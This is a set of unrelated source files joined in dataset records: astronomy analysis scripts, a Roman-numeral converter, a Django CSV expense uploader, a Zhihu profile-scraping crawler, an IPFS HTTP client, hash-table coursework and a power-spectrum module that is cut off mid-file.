HI_i[N]\n\n\tdeg = np.pi / 180\n\tvsys = -300 #km/s, as defined in Claire's thesis\n\tA = (v - vsys) / np.sin(i_ring * deg)\n\tB = np.tan((PA_ring - PA_star) * deg)**2\n\tC = np.cos(i_ring * deg)**2\n\trotation_velocity = A * np.sqrt(1 + B / C)\n\treturn abs(rotation_velocity)\n\n#calculating rotation velocities\nMS_vrot = Vrot_tilted_ring(np.array(MS_smoothed_data[0]), np.array(MS_smoothed_data[1]), np.array(MS_smoothed_data[2]))\nMS_HI_vrot = Vrot_tilted_ring(np.array(MS_smoothed_data[0]), np.array(MS_smoothed_data[1]), np.array(MS_smoothed_data[5]))\nMS_r = distance(np.array(MS_smoothed_data[0]), np.array(MS_smoothed_data[1]))\nAGy_vrot = Vrot_tilted_ring(np.array(AGy_smoothed_data[0]), np.array(AGy_smoothed_data[1]), np.array(AGy_smoothed_data[2]))\nAGy_HI_vrot = Vrot_tilted_ring(np.array(AGy_smoothed_data[0]), np.array(AGy_smoothed_data[1]), np.array(AGy_smoothed_data[5]))\nAGy_r = distance(np.array(AGy_smoothed_data[0]), np.array(AGy_smoothed_data[1]))\nAGo_vrot = Vrot_tilted_ring(np.array(AGo_smoothed_data[0]), np.array(AGo_smoothed_data[1]), np.array(AGo_smoothed_data[2]))\nAGo_HI_vrot = Vrot_tilted_ring(np.array(AGo_smoothed_data[0]), np.array(AGo_smoothed_data[1]), np.array(AGo_smoothed_data[5]))\nAGo_r = distance(np.array(AGo_smoothed_data[0]), np.array(AGo_smoothed_data[1]))\nRG_vrot = Vrot_tilted_ring(np.array(RG_smoothed_data[0]), np.array(RG_smoothed_data[1]), np.array(RG_smoothed_data[2]))\nRG_HI_vrot = Vrot_tilted_ring(np.array(RG_smoothed_data[0]), np.array(RG_smoothed_data[1]), np.array(RG_smoothed_data[5]))\nRG_r = distance(np.array(RG_smoothed_data[0]), np.array(RG_smoothed_data[1]))\n\n#save the data!!\nnp.savetxt('/Users/amandaquirk/Documents/Ellipsoid/Data/M31_MS.txt', np.c_[MS_smoothed_data[0], MS_smoothed_data[1], MS_r, MS_smoothed_data[2], MS_smoothed_data[3], MS_smoothed_data[4], MS_vrot, MS_smoothed_data[5], MS_HI_vrot, MS_smoothed_data[6], MS_smoothed_data[7]], delimiter=' ', header='xi (kpc), eta (kpc), r (kpc), LOS_v (km/s), verr (km/s), dispersion (km/s), vrot (km/s), HI v (km/s), HI vrot (km/s), n components, subMasterSPLASH index')\nnp.savetxt('/Users/amandaquirk/Documents/Ellipsoid/Data/M31_AGy.txt', np.c_[AGy_smoothed_data[0], AGy_smoothed_data[1], AGy_r, AGy_smoothed_data[2], AGy_smoothed_data[3], AGy_smoothed_data[4], AGy_vrot, AGy_smoothed_data[5], AGy_HI_vrot, AGy_smoothed_data[6], AGy_smoothed_data[7]], delimiter=' ', header='xi (kpc), eta (kpc), r (kpc), LOS_v (km/s), verr (km/s), dispersion (km/s), vrot (km/s), HI v (km/s), HI vrot (km/s), n components, subMasterSPLASH index')\nnp.savetxt('/Users/amandaquirk/Documents/Ellipsoid/Data/M31_AGo.txt', np.c_[AGo_smoothed_data[0], AGo_smoothed_data[1], AGo_r, AGo_smoothed_data[2], AGo_smoothed_data[3], AGo_smoothed_data[4], AGo_vrot, AGo_smoothed_data[5], AGo_HI_vrot, AGo_smoothed_data[6], AGo_smoothed_data[7]], delimiter=' ', header='xi (kpc), eta (kpc), r (kpc), LOS_v (km/s), verr (km/s), dispersion (km/s), vrot (km/s), HI v (km/s), HI vrot (km/s), n components, subMasterSPLASH index')\nnp.savetxt('/Users/amandaquirk/Documents/Ellipsoid/Data/M31_RG.txt', np.c_[RG_smoothed_data[0], RG_smoothed_data[1], RG_r, RG_smoothed_data[2], RG_smoothed_data[3], RG_smoothed_data[4], RG_vrot, RG_smoothed_data[5], RG_HI_vrot, RG_smoothed_data[6], RG_smoothed_data[7]], delimiter=' ', header='xi (kpc), eta (kpc), r (kpc), LOS_v (km/s), verr (km/s), dispersion (km/s), vrot (km/s), HI v (km/s), HI vrot (km/s), n components, subMasterSPLASH index')\n","sub_path":"Scripts/M31_vel_correction.py","file_name":"M31_vel_correction.py","file_ext":"py","file_size_in_byte":10111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"69973802","text":"#encoding: UTF-8\n\n#Autor: Roberto Téllez Perezyera\n\"\"\"\nEste programa puede leer un número decimal entre el 1 y el 10 y devolver el número correspondiente en romano.\n\"\"\"\n\n\n#Una función que recibe el número en decimal y regresa el número romano\ndef convertirDecimalARomano(numero) :\n if numero == 10 :\n return \"X\"\n if numero <= 3 :\n return numero * \"I\"\n if numero == 5 :\n return \"V\"\n if numero > 3 and numero < 5 :\n return \"IV\"\n if numero > 8 and numero < 10 :\n return \"IX\"\n if numero > 5 and numero < 9 :\n unos = numero - 5\n return \"V\", unos * \"I\"\n\n\n#Pedir número decimal al usuario e imprimir número romano o mensaje de error\ndef main():\n global numeroRomano\n numero = int(input(\"Escribe tu número favorito del 1 al 10: \"))\n if numero > 10 or numero < 1 :\n print (\"... del 1 al 10, por favor\")\n else :\n numeroRomano = convertirDecimalARomano(numero)\n print (numero, (\"en romano es: \"), numeroRomano)\n\n\nmain()\n","sub_path":"numerosRomanos.py","file_name":"numerosRomanos.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58849454","text":"# Ian Carreon, iancrrn@gmail.com\n# August 27, 2016\n\n# Create your views here.\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom .forms import UploadFileForm\n\n\nfrom .models import Employee\nfrom .models import ExpenseItem\n\nimport csv\nfrom datetime import date\n\nfrom django.db.models import Count\nfrom django.db.models import F, FloatField, Sum\n\nimport calendar\n\n# helper function\n# Option: place this function is some file and do something like\n# from somefile import handle_uploaded_file\ndef handle_uploaded_file(f):\n \n \"\"\"\n # for large files e.g. ~ 2GB may be we could chunk the file\n for chunk in f.chunks():\n do_something_with_the(chunk)\n \"\"\"\n \"\"\"\n How to handle long running asyncronous tasks: threading/multiprocessing, Celery/Redis, AWS SQS...\n \"\"\"\n \n csvreader = csv.reader(f)\n\n # This skips the first row (i.e. header) of the CSV file.\n next(csvreader)\n\n for row in csvreader:\n # do stuff with each row...\n \n # remove any whitespace\n row = [i.strip() for i in row]\n \n # Extract the expense item part\n expense_date = row[0].split('/') # extract year, month, day\n year = int(expense_date[2])\n month = int(expense_date[0])\n day = int(expense_date[1])\n \n category = row[1]\n description = row[4]\n \n # work with integers - avoid issues working with floats\n # convert to cents (i.e. multiply by 100)\n pre_tax_amount = int(float(row[5].replace(',', '')) * 100)\n tax_name = row[6]\n tax_amount = int(float(row[7].replace(',', '')) * 100)\n total_amount = int(pre_tax_amount + tax_amount)\n \n # Extract employee part\n employee_name = [i.strip() for i in row[2].split()]\n first_name = employee_name[0]\n last_name = employee_name[1]\n address = row[3]\n \n # if employee already in the databaase then use that otherwise create a new entry\n employee, created = Employee.objects.get_or_create(first_name=first_name, last_name=last_name, address=address)\n\n # if this expense item is already assigned to this employee then do nothing else create a new expense item for this employee\n expense_item, created = ExpenseItem.objects.get_or_create(date=date(year, month, day), category=category, description=description, \n pre_tax_amount=pre_tax_amount, tax_name=tax_name, tax_amount=tax_amount, total_amount=total_amount, employee=employee)\n \n\ndef upload_file(request):\n \n # used for the data to return to the template\n data = []\n \n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n \n try:\n handle_uploaded_file(request.FILES['file'])\n # catch all for now\n # but depending on the error we can bow out gracefully or continue\n # i.e if exception is an IntegrityError then continue...\n # i.e if list index out of range error then stop - possibly invalid CSV file\n except Exception as e: \n return render(request, 'upload.html', {'form': form, 'data':data, 'error_msg':e})\n \n \n # This section builds the data to return to the template as a list of 'JSON' style/dicts objects\n \"\"\"\n E.g. something like\n data = [{'year':1998, 'month_list':[{'month':'January', 'total':2.89}]}, \n {'year':2005, 'month_list':[{'month':'October', 'total':53.99}]}, \n {'year':2010, 'month_list':[{'month':'March', 'total':3.99}]}]\n \"\"\"\n \n # hit the database once\n query_set = ExpenseItem.objects.all()\n \n # get all distinct years\n years = query_set.dates('date','year')\n \n # option to sort years ASC or DESC...\n \n # Group by year\n for year in years:\n year_dict = {}\n \n year_dict['year'] = year.year\n \n month_list = []\n \n # Get the months for this year\n months = query_set.filter(date__year=year.year).dates('date','month')\n for month in months:\n \n month_dict = {}\n \n # build each month dict\n month_dict['month'] = calendar.month_name[month.month]\n result = query_set.filter(date__year=year.year).filter(date__month=month.month).aggregate(total_expenses_amount=Sum(F('total_amount'), output_field=FloatField()))\n \n month_dict['total'] = '%0.2f' % (result['total_expenses_amount']/100) # divide by 100 -> dollar and cents format\n \n # then add month dict to month list\n month_list.append(month_dict)\n \n year_dict['month_list'] = month_list\n \n data.append(year_dict) \n else:\n form = UploadFileForm()\n \n return render(request, 'upload.html', {'form': form, 'data':data, 'error_msg':None})\n","sub_path":"se_challenge/upload_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"151611392","text":"import requests\nimport codecs\nimport json\nimport time\nfrom collections import deque\nfrom bs4 import BeautifulSoup\n\nfrom enum import Enum\nclass DebugLevel(Enum):\n verbose = 1\n warning = 2\n error = 3\n end = 4\n\nclass ZhihuCrawler(object):\n def __init__(self):\n self._base_url = r\"https://www.zhihu.com\"\n self._start_url = r\"https://www.zhihu.com/topic/19551052/followers\"\n self._debug_level = DebugLevel.verbose\n self._visited_user_url = set() #set 查找元素的时间复杂度是O(1)\n self._last_user_id = 1458573819\n self._offset = 40\n ZhihuCommon.session_init()\n self._config = self._load_config()\n\n def _load_config(self):\n struct = {\"account\": r\"\", \"password\": r\"\",\n \"Note\": \"account can be 'email' or 'phone number'\"}\n try:\n with open(ZhihuCommon.config_json_file, \"r\", encoding = \"utf-8\") as fp:\n config = json.loads(fp.read())\n struct.update(config)\n except Exception as e:\n with open(ZhihuCommon.config_json_file, \"w+\", encoding = \"utf-8\") as fp:\n fp.write(json.dumps(struct, indent=4))\n finally:\n return struct\n\n def _save_user(self, user):\n with open(ZhihuCommon.user_json_file, \"a\", encoding = \"utf-8\") as fp:\n json_str = json.dumps(user, default = ZhihuUser.obj_to_dict, ensure_ascii = False, sort_keys = True)\n fp.write(json_str + \"\\n\")\n\n def init_xsrf(self):\n \"\"\"初始化,获取xsrf\"\"\"\n\n try:\n #下载线_的解释: it has the special meaning that \"I don't need this variable, I'm only putting something\n # here because the API/syntax/whatever requires it\"\n _, soup = ZhihuCommon.get(self._base_url)\n input_tag = soup.find(\"input\", {\"name\": \"_xsrf\"})\n xsrf = input_tag[\"value\"]\n ZhihuCommon.set_xsrf(xsrf)\n except Exception as e:\n self._debug_print(DebugLevel.error, \"fail to init xsrf. \" + str(e))\n\n\n def do_crawler(self):\n while (self._offset < 100000):\n post_dict = {\n 'offset': self._offset,\n 'start': self._last_user_id,\n '_xsrf': ZhihuCommon.get_xsrf(),\n }\n json_Str = ZhihuCommon.post(self._start_url, post_dict)\n user_json = json_Str.json()[\"msg\"][1]\n soup = BeautifulSoup(user_json)\n users_id = soup.find_all(\"div\", class_=\"zm-person-item\")\n users_info = soup.find_all(\"a\", class_=\"zm-list-avatar-medium\")\n for user_info in users_info:\n author = ZhihuUser(self._base_url + user_info.attrs[\"href\"])\n if author.is_valid():\n self._save_user(author)\n user_num = len(users_id)\n self._offset += user_num\n self._last_user_id = int(users_id[user_num-1][\"id\"][3:])\n\n def login(self):\n \"\"\"获取登录后的界面,需要先运行init_xsrf\"\"\"\n\n if not len(self._config[\"account\"]):\n print(\"Please fill config.json with your account.\")\n\n login_by = 'email' if '@' in self._config[\"account\"] else 'phone_num'\n login_url = self._base_url + r\"/login/\" + login_by\n\n post_dict = {\n 'remember_me': 'true',\n 'password': self._config[\"password\"],\n '_xsrf': ZhihuCommon.get_xsrf(),\n }\n post_dict.update({login_by: self._config[\"account\"]})\n\n response_login = ZhihuCommon.post(login_url, post_dict)\n # response content: {\"r\":0, \"msg\": \"\\u767b\\u9646\\u6210\\u529f\" }\n return response_login.json()[\"r\"] == 0\n #self._save_file('login_page.htm', reponse_login.text, reponse_login.encoding)\n\nclass ZhihuUser(object):\n _extra_info_key = (\"education item\", \"education-extra item\", \"employment item\", \\\n \"location item\", \"position item\");\n\n def __init__(self, user_url):\n self._debug_level = DebugLevel.verbose\n self._user_url = user_url\n self._valid = self._parse_user_page()\n if self._valid:\n self.parse_extra_info()\n\n def is_valid(self):\n return self._valid\n\n def get_url(self):\n return self._user_url\n\n def _debug_print(self, level, log_str):\n if level.value >= self._debug_level.value:\n print(\"[USER] \" + log_str)\n\n def _save_file(self, path, str_content, encoding):\n with codecs.open(path, 'w', encoding) as fp:\n fp.write(str_content)\n\n @staticmethod\n def obj_to_dict(obj):\n \"\"\"把ZhihuUser转成dict数据,用于ZhihuCrawler。save_user中的json dump\"\"\"\n tmp_dict = {}\n tmp_dict[\"name\"] = obj._name\n tmp_dict[\"url\"] = obj._user_url\n tmp_dict[\"thank_cnt\"] = obj._thank_cnt\n tmp_dict[\"agree_cnt\"] = obj._agree_cnt\n tmp_dict[\"gender\"] = obj._gender\n tmp_dict[\"img_url\"] = obj._img_url\n for key_str in ZhihuUser._extra_info_key:\n if key_str in obj._extra_info:\n tmp_dict[key_str] = obj._extra_info[key_str]\n else:\n tmp_dict[key_str] = \"\"\n\n return tmp_dict\n\n def _parse_user_page(self):\n try:\n _, soup = ZhihuCommon.get(self._user_url)\n self.soup = soup\n #class_即是查找class,因为class是保留字,bs框架做了转化\n head_tag = soup.find(\"div\", class_=\"zm-profile-header\")\n name_tag = head_tag.find(\"span\", class_=\"name\")\n name = name_tag.contents[0]\n agree_tag = head_tag.find(\"span\", class_=\"zm-profile-header-user-agree\")\n agree_cnt = agree_tag.contents[1].contents[0]\n thank_tag = head_tag.find(\"span\", class_=\"zm-profile-header-user-thanks\")\n thank_cnt = thank_tag.contents[1].contents[0]\n img_url = soup.find(\"img\", class_=\"Avatar Avatar--l\")\n gender_tag = head_tag.find(\"span\", class_=\"item gender\")\n if (gender_tag == None):\n self._gender = \"Unknown gender\"\n else:\n #gender_tag.cont...nts[0][\"class\"]是一个list,list的每一个元素是字符串\n gender_str = gender_tag.contents[0][\"class\"][1]\n if gender_str.find(\"female\") > 0:\n self._gender = \"Female\"\n elif gender_str.find(\"male\") > 0:\n self._gender = \"Male\"\n else:\n self._gender = \"Unknown gender\"\n self._name = name\n self._thank_cnt = int(thank_cnt)\n self._agree_cnt = int(agree_cnt)\n self._img_url = img_url.attrs[\"src\"]\n is_ok = True\n self._debug_print(DebugLevel.verbose, \"parse \" + self._user_url + \" ok. \" + \"name:\" + self._name)\n except Exception as e:\n self._debug_print(DebugLevel.warning, \"some exception raised by parsing \" \\\n + self._user_url + \"ErrInfo: \" + str(e))\n is_ok = False\n finally:\n return is_ok\n\n def parse_extra_info(self):\n #\n self._extra_info = {}\n for key_str in self._extra_info_key:\n tag = self.soup.find(\"span\", class_=key_str)\n if tag is not None:\n self._extra_info[key_str] = tag[\"title\"]\n\n\n def __str__(self):\n #print类的实例打印的字符串\n out_str = \"User \" + self._name + \" agree: \" + str(self._agree_cnt) + \", \" \\\n \"thank: \" + str(self._thank_cnt) + \" \" + self._gender + \" \"\n\n for key_str in self._extra_info_key:\n if key_str in self._extra_info:\n out_str += \" \" + key_str + \": \" + self._extra_info[key_str]\n\n return out_str\n\nclass ZhihuCommon(object):\n \"\"\"ZhihuCrawler, ZhihuTopic, ZhihuUser三个类的共用代码, 包含一些服务于debug的函数, 共用的网页获取函数, 等。\"\"\"\n\n root_topic = 19776749 # 19776749 根话题 19776751 未归类 19778298 形而上\n unclassed_topic = 19776751\n my_header = {\n 'Connection': 'Keep-Alive',\n 'Accept': 'text/html, application/xhtml+xml, */*',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',\n 'Accept-Encoding': 'gzip,deflate,sdch',\n 'Host': 'www.zhihu.com',\n 'DNT': '1'\n }\n\n \"\"\"运行参数\"\"\"\n debug_fast_crawler = False #快速模式是否打开,当此模式打开时,不会遍历所有同类的信息,用于调试。\n traversal_level_max = 3 #深度优化遍历最大层数限制\n user_json_file = \"user.json\"\n answer_json_file = \"answer.json\"\n topic_json_file = \"topic.json\"\n config_json_file = \"config.json\"\n\n _last_get_page_fail = False #上一次调用get_page是失败的?\n _xsrf = None\n _session = None\n\n @staticmethod\n def set_xsrf(xsrf):\n ZhihuCommon._xsrf = xsrf\n\n @staticmethod\n def get_xsrf():\n return ZhihuCommon._xsrf\n\n @staticmethod\n def session_init():\n ZhihuCommon._session = requests.Session()\n\n @staticmethod\n def get_session():\n return ZhihuCommon._session\n\n @staticmethod\n def get(url):\n try_time = 0\n\n while try_time < 5:\n #上一次get页面失败,暂停10秒\n if ZhihuCommon._last_get_page_fail:\n time.sleep(10)\n\n try:\n try_time += 1\n response = ZhihuCommon.get_session().get(url, headers = ZhihuCommon.my_header, timeout = 30)\n #, cert = 'F:\\Programs\\Class-3-Public-Primary-Certification-Authority.pem')\n soup = BeautifulSoup(response.text, \"html.parser\")\n ZhihuCommon._last_get_page_fail = False\n return response.text, soup\n except Exception as e:\n print(\"fail to get \" + url + \" error info: \" + str(e) + \" try_time \" + str(try_time))\n ZhihuCommon._last_get_page_fail = True\n else:\n raise #当前函数不知道应该怎么处理该错误,所以,最恰当的方式是继续往上抛,让顶层调用者去处理\n\n @staticmethod\n def post(url, post_dict):\n try_time = 0\n\n while try_time < 5:\n #上一次get页面失败,暂停10秒\n if ZhihuCommon._last_get_page_fail:\n time.sleep(10)\n\n try:\n try_time += 1\n response = ZhihuCommon.get_session().post(url, headers = ZhihuCommon.my_header, data = post_dict, timeout = 30)\n #, cert = 'F:\\Programs\\Class-3-Public-Primary-Certification-Authority.pem')\n ZhihuCommon._last_get_page_fail = False\n return response\n except Exception as e:\n print(\"fail to post \" + url + \" error info: \" + str(e) + \" try_time \" + str(try_time))\n ZhihuCommon._last_get_page_fail = True\n else:\n raise #当前函数不知道应该怎么处理该错误,所以,最恰当的方式是继续往上抛,让顶层调用者去处理\n\n @staticmethod\n def get_and_save_page(url, path):\n try:\n response = ZhihuCommon.get_session().get(url, headers = ZhihuCommon.my_header, verify = False)\n with codecs.open(path, 'w', response.encoding) as fp:\n fp.write(response.text)\n return\n except Exception as e:\n print(\"fail to get \" + url + \" error info: \" + str(e))\n return\n\ndef main():\n z = ZhihuCrawler()\n z.init_xsrf()\n login_sucess = z.login()\n if not login_sucess:\n print(\"fail to login.\")\n return\n z.do_crawler()\n\n print(\"ok\\n\")\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"crawler_user.py","file_name":"crawler_user.py","file_ext":"py","file_size_in_byte":11841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"575245313","text":"\"\"\"\nHTTP client for api requests. This is pluggable into the IPFS Api client and\ncan/will eventually be supplemented with an asynchronous version.\n\"\"\"\nimport requests\nimport contextlib\n\nfrom . import encoding\n\n\n\nclass HTTPClient(object):\n\n def __init__(self, host, port, base, default_enc):\n self.host = host\n self.port = port\n self.base = 'http://%s:%s/%s' % (host, port, base)\n\n self.default_enc = encoding.get_encoding(default_enc)\n self._session = None\n\n\n def request(self, path,\n args=[], opts={}, files=[],\n decoder=None, post_hook=None,\n **kwargs):\n \n url = self.base + path\n \n params = []\n params.append(('stream-channels', 'true'))\n for opt in opts.items():\n params.append(opt)\n for arg in args:\n params.append(('arg', arg))\n\n method = 'post' if (files or kwargs.has_key('data')) else 'get'\n \n if self._session:\n res = self._session.request(method, url,\n params=params, files=files, **kwargs)\n else:\n res = requests.request(method, url,\n params=params, files=files, **kwargs)\n\n if not decoder:\n try:\n ret = self.default_enc.parse(res.text)\n except:\n ret = res.text\n else:\n enc = encoding.get_encoding(decoder)\n try:\n ret = enc.parse(res.text)\n except:\n ret = res.text\n \n if post_hook:\n return post_hook(ret)\n return ret\n\n\n @contextlib.contextmanager\n def session(self):\n self._session = requests.session()\n yield\n self._session.close()\n self._session = None\n","sub_path":"ipfsApi/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"398736136","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 5 11:04:17 2019\n\n@author: jonahcullen\n\"\"\"\n\nimport argparse\nimport os\n\n\ndef make_arg_parser():\n parser = argparse.ArgumentParser(\n prog=\"GeneratePBS.py\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n \"-d\", \"--data\",\n default=argparse.SUPPRESS,\n metavar=\"\",\n required=True,\n help=\"Path to dir containing the pbs submission scripts files [required]\")\n return parser\n\n\nif __name__ == '__main__':\n \n parser = make_arg_parser()\n args = parser.parse_args()\n\n data = os.path.abspath(args.data)\n\n pbs = os.path.join(os.getcwd(), \"submit_pbs_scripts.sh\")\n\n with open(pbs, \"w\") as f:\n for file_name in os.listdir(data):\n if file_name.endswith(\".pbs\"):\n print(f\"qsub {data}/\", file_name, file = f, sep = \"\")\n","sub_path":"RANDOM_REQUESTS/Ted_K/python_scripts/Generate_pbs_submission_shell_script.py","file_name":"Generate_pbs_submission_shell_script.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"471915070","text":"\"\"\"\nSeparate Chaining Hash Table based functions, timings and statistics\n\n@author Mark Diedericks 30572738\n@since 21/10/2019\n@modified 21/10/2019\n\"\"\"\n\nimport bst\nfrom task1 import HashTable as HashTableLinear\nfrom task3 import load_dictionary_statistics\n\nclass BinarySearchTree(bst.BinarySearchTree):\n def insert(self, key, value):\n \"\"\"\n Will attempt to insert at a value with a given key\n\n @param key: The key to search for and get it's value\n @return The depth at which the key-value pair was inserted\n @complexity O(log n) for both best and worst case, where n is the depth of the binary search tree\n @postcondition The binary search tree will contain the given key-value par\n \"\"\"\n if self.root is None:\n self.root = bst.BinaryTreeNode(key, value)\n return 0 # It was the root node, so depth of 0\n\n depth = 0 # Start at root, so depth of 0\n current_node = self.root\n while True:\n if key < current_node.key:\n depth += 1 # Increment depth at where the insert is\n if current_node.left is None:\n current_node.left = bst.BinaryTreeNode(key, value)\n break\n else:\n current_node = current_node.left\n elif key > current_node.key:\n depth += 1 # Increment depth at where the insert is\n if current_node.right is None:\n current_node.right = bst.BinaryTreeNode(key, value)\n break\n else:\n current_node = current_node.right\n else:\n assert current_node.key == key\n current_node.item = value\n break\n\n # Return set/insertion depth\n return depth\n\nclass HashTable(HashTableLinear): \n ### Override only the methods which directly implement linear probing ###\n ### Implement separate chaining instead. ###\n \n def __getitem__(self, key):\n \"\"\"\n Will attempt to get the value associoated with the given key\n\n @param key: The key to search for and get it's value\n @return The value of associated with the given key\n @raises KeyError: key does not exist in the hash table\n @complexity O(log n) for both best and worst case, where n is the length of the binary search tree,\n @precondition The parameter key is of type string\n @postcondition The value for the key will be returned if the key exists within the hash table\n \"\"\"\n \n # assert preconditions\n assert isinstance(key, str)\n\n # Get starting index and table size\n i = self.hash(key)\n\n # If slot is not empty, attempt to find key\n # BinarySearchTree will raise KeyError if not found.\n if self.table[i] is not None:\n assert isinstance(self.table[i], BinarySearchTree)\n return self.table[i][key]\n\n # Key wasn't found\n raise KeyError('Key does not exist in table.')\n\n def __setitem__(self, key, item):\n \"\"\"\n Will set value of existing key-value pair, insert new key-value pair if not existent within dictionary. \n Will also rehash the hash table if it is full, inserting the key-value pair afterwards.\n\n @param key: The key of the key value pair, hashed to find index\n @param item: The value associated with the key\n @return None\n @complexity O(log n) for both best and worst case, where n is the length of the binary search tree,\n @precondition The parameter key is of type string\n @postcondition The hash table will contain the the item at for the given key\n \"\"\"\n \n # assert preconditions\n assert isinstance(key, str)\n\n # Get starting index and table size\n i = self.hash(key)\n\n # If a pair is where this is meant to be, we have a collision\n # If that pair has the same key we are setting, not inserting\n # thus it cannot count as a collision.\n if self.table[i] is not None:\n self.collisions += 1\n else:\n self.table[i] = BinarySearchTree()\n \n assert isinstance(self.table[i], BinarySearchTree)\n\n # Insert/set and get probe length stat\n depth = self.table[i].insert(key, item)\n self.count += 1\n\n # We're adding a new pair, so consider probe length\n self.probe_len += depth\n if depth > self.probe_max:\n self.probe_max = depth\n\n def __contains__(self, key):\n \"\"\"\n Determines whether or not the hash table contains a specified key\n\n @param key: the key to search for\n @return Whether or not the key exists within the hash table\n @complexity O(1) for best case - no BST. O(log n) for worst case, where n is the length of the binary search tree,\n @precondition The parameter key is of type string\n \"\"\"\n \n # assert preconditions\n assert isinstance(key, str)\n\n # Get starting index and table size\n i = self.hash(key)\n if self.table[i] is not None:\n assert isinstance(self.table[i], BinarySearchTree)\n return key in self.table[i]\n\n # Key wasn't found\n return False\n\n\ndef table_load_dictionary_statistics(max_time):\n \"\"\"\n Will execute load_dictionary_time on a combination of files, sizes and bases. Saving the data, along with timing and words\n to a file. Uses separate chaining hash table..\n \n @param max_time: how long load_dictionary operates before timing out, if none the function wont time out\n @return None\n @complexity O(nm) for both best and worst case. Where n is cost of load_dictionary and m is the number of size-base-file combinations\n @postcondition A file, 'output_task5.csv', will contain the filename, table, base, words, collisions, probe length, max probe length \n and rehash count time data for each combination.\n \"\"\"\n\n TABLE_BASE = [1, 27183, 250726]\n TABLE_SIZE = [250727, 402221, 1000081]\n FILE_NAMES = [\"english_small.txt\", \"english_large.txt\", \"french.txt\"]\n\n # Get output file handle\n f = open(\"output_task5.csv\", 'w+', encoding=\"UTF-8\")\n\n # Create headers\n f.write('File Name,Table Size,Table Base,Words,Time,Collisions,Probe Total,Probe Max, Rehashes\\n')\n\n # Loop through each combination\n for file in FILE_NAMES:\n for size in TABLE_SIZE:\n for base in TABLE_BASE:\n # Run combination with quadratic probing hash table\n res = load_dictionary_statistics(base, size, file, max_time, HashTable(size, base))\n\n words = res[0]\n time = res[1] if res[1] is not None else \"TIMEOUT\"\n col = res[2]\n pro = res[3]\n promax = res[4]\n rehashes = res[5]\n\n # Print results to file\n f.write('{0},{1},{2},{3},{4},{5},{6},{7},{8}\\n'.format(file, size, base, words, time, col, pro, promax, rehashes))\n print('{0},{1},{2},{3},{4},{5},{6},{7},{8}'.format(file, size, base, words, time, col, pro, promax, rehashes))\n\n # Close file\n f.close()\n\n # Ensure file is closed\n if not f.closed:\n raise IOError('File is not closed.')\n\n\nif __name__ == '__main__':\n table_load_dictionary_statistics(120)\n\n","sub_path":"Interview Prac 3/task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":7529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"238801809","text":"\n\nfrom xai.brain.wordbase.nouns._llama import _LLAMA\n\n#calss header\nclass _LLAMAS(_LLAMA, ):\n\tdef __init__(self,): \n\t\t_LLAMA.__init__(self)\n\t\tself.name = \"LLAMAS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"llama\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_llamas.py","file_name":"_llamas.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"308490753","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 31 14:37:11 2016\nModule which computes a the 2D spatial power spectrum of a given image. Used for VCA analysis. \n@author: npingel\n\"\"\"\n\n#imports\nimport numpy as np\nfrom astropy.io import fits\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as pyplot\nimport matplotlib\n\nmatplotlib.rc('font', family='sans-serif')\nmatplotlib.rc('font', serif='Helvetica Neue')\nmatplotlib.rc('text', usetex='false')\nmatplotlib.rcParams.update({'font.size': 14})\n\n\n##method to compute relevent gridding paramters and coordinates; returns pixel boundaries in modulus image for lower,\n##upper, and corresponding physical scale taken as the mid-point between the lower and upper boundaries\n##numPaddedPix is the number of pixels along one axis in padded image\n##angRes is the angular resolution of single pixel in original image (arcmin)\n##origAngExt is the original angular extent of the integrated image\ndef scale(numPaddedPix,angRes,origAngExt): \n distance = 300. ##pc\n totAngularCoverage = numPaddedPix*angRes/60.\n maxPhysScale = 2*distance*np.tan(np.deg2rad(totAngularCoverage/2.))\n modRes = (distance)/maxPhysScale ## pixel resolution of modulus image\n maxSpatialFreq = (numPaddedPix/2.)*modRes \n ##pixel radius of annuli boundaries \n lowerRadius = []\n midRadius = []\n upperRadius = [] \n minSpatialFreq = distance/(2*distance*np.tan(np.deg2rad(origAngExt/2.)))\n logInc = (np.log(maxSpatialFreq)-np.log(minSpatialFreq))/18. \n initLower = np.log(minSpatialFreq)\n for i in range(0,18):\n lowerRadius.append(initLower+(i*logInc))\n midRadius.append(lowerRadius[i]+logInc/2.)\n upperRadius.append(lowerRadius[i]+logInc)\n ##corresponding physical extent taken as midpoint between annuli\n midRadiusArr=np.array(midRadius,dtype='float32')\n lowerRadiusArr = np.array(lowerRadius, dtype='float32')\n upperRadiusArr = np.array(upperRadius, dtype='float32') \n spatialScale = distance/np.exp(midRadiusArr)\n return np.exp(lowerRadiusArr)/modRes,np.exp(upperRadiusArr)/modRes, spatialScale\n\n##function for fitting\ndef linFunc(x,slope,b):\n return x*slope+b\n \ndef 